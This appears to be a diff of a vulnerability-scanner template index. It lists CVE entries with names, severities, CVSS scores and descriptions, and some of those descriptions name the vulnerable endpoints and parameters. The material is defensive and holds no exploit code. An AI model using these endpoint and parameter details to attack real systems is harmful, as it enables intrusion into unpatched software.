{"ID":"CVE-2014-3206","Info":{"Name":"Seagate BlackArmor NAS - Command Injection","Severity":"critical","Description":"Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-3206.yaml"} {"ID":"CVE-2014-3206","Info":{"Name":"Seagate BlackArmor NAS - Command Injection","Severity":"critical","Description":"Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-3206.yaml"}
{"ID":"CVE-2014-3704","Info":{"Name":"Drupal SQL Injection","Severity":"high","Description":"The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3704.yaml"} {"ID":"CVE-2014-3704","Info":{"Name":"Drupal SQL Injection","Severity":"high","Description":"The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3704.yaml"}
{"ID":"CVE-2014-3744","Info":{"Name":"Node.js st module Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3744.yaml"} {"ID":"CVE-2014-3744","Info":{"Name":"Node.js st module Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3744.yaml"}
{"ID":"CVE-2014-4210","Info":{"Name":"Oracle Weblogic - Server-Side Request Forgery","Severity":"medium","Description":"An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-4210.yaml"} {"ID":"CVE-2014-4210","Info":{"Name":"Oracle Weblogic - Server-Side Request Forgery","Severity":"medium","Description":"An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-4210.yaml"}
{"ID":"CVE-2014-4513","Info":{"Name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-4513.yaml"} {"ID":"CVE-2014-4513","Info":{"Name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-4513.yaml"}
{"ID":"CVE-2014-4535","Info":{"Name":"Import Legacy Media \u003c= 0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4535.yaml"} {"ID":"CVE-2014-4535","Info":{"Name":"Import Legacy Media \u003c= 0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4535.yaml"}
{"ID":"CVE-2014-4536","Info":{"Name":"Infusionsoft Gravity Forms Add-on \u003c 1.5.7 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4536.yaml"} {"ID":"CVE-2014-4536","Info":{"Name":"Infusionsoft Gravity Forms Add-on \u003c 1.5.7 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4536.yaml"}
@ -271,6 +271,7 @@
{"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"medium","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2166.yaml"} {"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"medium","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2166.yaml"}
{"ID":"CVE-2015-2196","Info":{"Name":"WordPress Spider Calendar \u003c=1.4.9 - SQL Injection","Severity":"high","Description":"WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2196.yaml"} {"ID":"CVE-2015-2196","Info":{"Name":"WordPress Spider Calendar \u003c=1.4.9 - SQL Injection","Severity":"high","Description":"WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2196.yaml"}
{"ID":"CVE-2015-2755","Info":{"Name":"WordPress AB Google Map Travel \u003c=3.4 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2015/CVE-2015-2755.yaml"} {"ID":"CVE-2015-2755","Info":{"Name":"WordPress AB Google Map Travel \u003c=3.4 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2015/CVE-2015-2755.yaml"}
{"ID":"CVE-2015-2794","Info":{"Name":"DotNetNuke 07.04.00 - Administration Authentication Bypass","Severity":"critical","Description":"The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-2794.yaml"}
{"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2807.yaml"} {"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2807.yaml"}
{"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"medium","Description":"Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2863.yaml"} {"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"medium","Description":"Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2863.yaml"}
{"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Inclusion","Severity":"high","Description":"SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2015/CVE-2015-2996.yaml"} {"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Inclusion","Severity":"high","Description":"SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2015/CVE-2015-2996.yaml"}
@ -624,6 +625,7 @@
{"ID":"CVE-2018-8719","Info":{"Name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","Severity":"medium","Description":"WordPress WP Security Audit Log 3.1.1 plugin is susceptible to information disclosure. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-8719.yaml"} {"ID":"CVE-2018-8719","Info":{"Name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","Severity":"medium","Description":"WordPress WP Security Audit Log 3.1.1 plugin is susceptible to information disclosure. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-8719.yaml"}
{"ID":"CVE-2018-8727","Info":{"Name":"Mirasys DVMS Workstation \u003c=5.12.6 - Local File Inclusion","Severity":"high","Description":"Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-8727.yaml"} {"ID":"CVE-2018-8727","Info":{"Name":"Mirasys DVMS Workstation \u003c=5.12.6 - Local File Inclusion","Severity":"high","Description":"Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-8727.yaml"}
{"ID":"CVE-2018-8770","Info":{"Name":"Cobub Razor 0.8.0 - Information Disclosure","Severity":"medium","Description":"Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-8770.yaml"} {"ID":"CVE-2018-8770","Info":{"Name":"Cobub Razor 0.8.0 - Information Disclosure","Severity":"medium","Description":"Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-8770.yaml"}
{"ID":"CVE-2018-8823","Info":{"Name":"PrestaShop Responsive Mega Menu Module - Remote Code Execution","Severity":"critical","Description":"The 'Responsive Mega Menu' module for PrestaShop is prone to a remote code execution and SQL injection vulnerability. modules/bamegamenu/ajax_phpcode.php in the Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro module 1.0.32 for PrestaShop allows remote attackers to execute an SQL injection or remote code execution through function calls in the code parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-8823.yaml"}
{"ID":"CVE-2018-9118","Info":{"Name":"WordPress 99 Robots WP Background Takeover Advertisements \u003c=4.1.4 - Local File Inclusion","Severity":"high","Description":"WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-9118.yaml"} {"ID":"CVE-2018-9118","Info":{"Name":"WordPress 99 Robots WP Background Takeover Advertisements \u003c=4.1.4 - Local File Inclusion","Severity":"high","Description":"WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-9118.yaml"}
{"ID":"CVE-2018-9161","Info":{"Name":"PrismaWEB - Credentials Disclosure","Severity":"critical","Description":"PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-9161.yaml"} {"ID":"CVE-2018-9161","Info":{"Name":"PrismaWEB - Credentials Disclosure","Severity":"critical","Description":"PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-9161.yaml"}
{"ID":"CVE-2018-9205","Info":{"Name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","Severity":"high","Description":"In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-9205.yaml"} {"ID":"CVE-2018-9205","Info":{"Name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","Severity":"high","Description":"In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-9205.yaml"}
@ -1088,7 +1090,7 @@
{"ID":"CVE-2021-22005","Info":{"Name":"VMware vCenter Server - Arbitrary File Upload","Severity":"critical","Description":"VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22005.yaml"} {"ID":"CVE-2021-22005","Info":{"Name":"VMware vCenter Server - Arbitrary File Upload","Severity":"critical","Description":"VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22005.yaml"}
{"ID":"CVE-2021-22053","Info":{"Name":"Spring Cloud Netflix Hystrix Dashboard \u003c2.2.10 - Remote Code Execution","Severity":"high","Description":"Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-22053.yaml"} {"ID":"CVE-2021-22053","Info":{"Name":"Spring Cloud Netflix Hystrix Dashboard \u003c2.2.10 - Remote Code Execution","Severity":"high","Description":"Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-22053.yaml"}
{"ID":"CVE-2021-22054","Info":{"Name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","Severity":"high","Description":"VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-22054.yaml"} {"ID":"CVE-2021-22054","Info":{"Name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","Severity":"high","Description":"VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-22054.yaml"}
{"ID":"CVE-2021-22122","Info":{"Name":"FortiWeb - Cross-Site Scripting","Severity":"medium","Description":"FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-22122.yaml"} {"ID":"CVE-2021-22122","Info":{"Name":"FortiWeb - Cross Site Scripting","Severity":"medium","Description":"FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-22122.yaml"}
{"ID":"CVE-2021-22145","Info":{"Name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","Severity":"medium","Description":"ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-22145.yaml"} {"ID":"CVE-2021-22145","Info":{"Name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","Severity":"medium","Description":"ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-22145.yaml"}
{"ID":"CVE-2021-22205","Info":{"Name":"GitLab CE/EE - Remote Code Execution","Severity":"critical","Description":"GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-\u003chash\u003e.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2021/CVE-2021-22205.yaml"} {"ID":"CVE-2021-22205","Info":{"Name":"GitLab CE/EE - Remote Code Execution","Severity":"critical","Description":"GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-\u003chash\u003e.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2021/CVE-2021-22205.yaml"}
{"ID":"CVE-2021-22214","Info":{"Name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","Severity":"high","Description":"GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:\n- CVE-2021-39935\n- CVE-2021-22214\n- CVE-2021-22175\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2021/CVE-2021-22214.yaml"} {"ID":"CVE-2021-22214","Info":{"Name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","Severity":"high","Description":"GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:\n- CVE-2021-39935\n- CVE-2021-22214\n- CVE-2021-22175\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2021/CVE-2021-22214.yaml"}
@ -1257,6 +1259,7 @@
{"ID":"CVE-2021-28937","Info":{"Name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","Severity":"high","Description":"Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-28937.yaml"} {"ID":"CVE-2021-28937","Info":{"Name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","Severity":"high","Description":"Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-28937.yaml"}
{"ID":"CVE-2021-29006","Info":{"Name":"rConfig 3.9.6 - Local File Inclusion","Severity":"medium","Description":"rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-29006.yaml"} {"ID":"CVE-2021-29006","Info":{"Name":"rConfig 3.9.6 - Local File Inclusion","Severity":"medium","Description":"rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-29006.yaml"}
{"ID":"CVE-2021-29156","Info":{"Name":"LDAP Injection In OpenAM","Severity":"high","Description":"OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-29156.yaml"} {"ID":"CVE-2021-29156","Info":{"Name":"LDAP Injection In OpenAM","Severity":"high","Description":"OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-29156.yaml"}
{"ID":"CVE-2021-29200","Info":{"Name":"Apache OFBiz \u003c 17.12.07 - Arbitrary Code Execution","Severity":"critical","Description":"Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29200.yaml"}
{"ID":"CVE-2021-29203","Info":{"Name":"HPE Edgeline Infrastructure Manager \u003c1.22 - Authentication Bypass","Severity":"critical","Description":"HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29203.yaml"} {"ID":"CVE-2021-29203","Info":{"Name":"HPE Edgeline Infrastructure Manager \u003c1.22 - Authentication Bypass","Severity":"critical","Description":"HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29203.yaml"}
{"ID":"CVE-2021-29441","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"critical","Description":"This template only works on Nuclei engine prior to version 2.3.3 and version \u003e= 2.3.5.\n\nIn Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)\nNacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that\nenables Nacos servers to bypass this filter and therefore skip authentication checks.\nThis mechanism relies on the user-agent HTTP header so it can be easily spoofed.\nThis issue may allow any user to carry out any administrative tasks on the Nacos server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29441.yaml"} {"ID":"CVE-2021-29441","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"critical","Description":"This template only works on Nuclei engine prior to version 2.3.3 and version \u003e= 2.3.5.\n\nIn Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)\nNacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that\nenables Nacos servers to bypass this filter and therefore skip authentication checks.\nThis mechanism relies on the user-agent HTTP header so it can be easily spoofed.\nThis issue may allow any user to carry out any administrative tasks on the Nacos server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29441.yaml"}
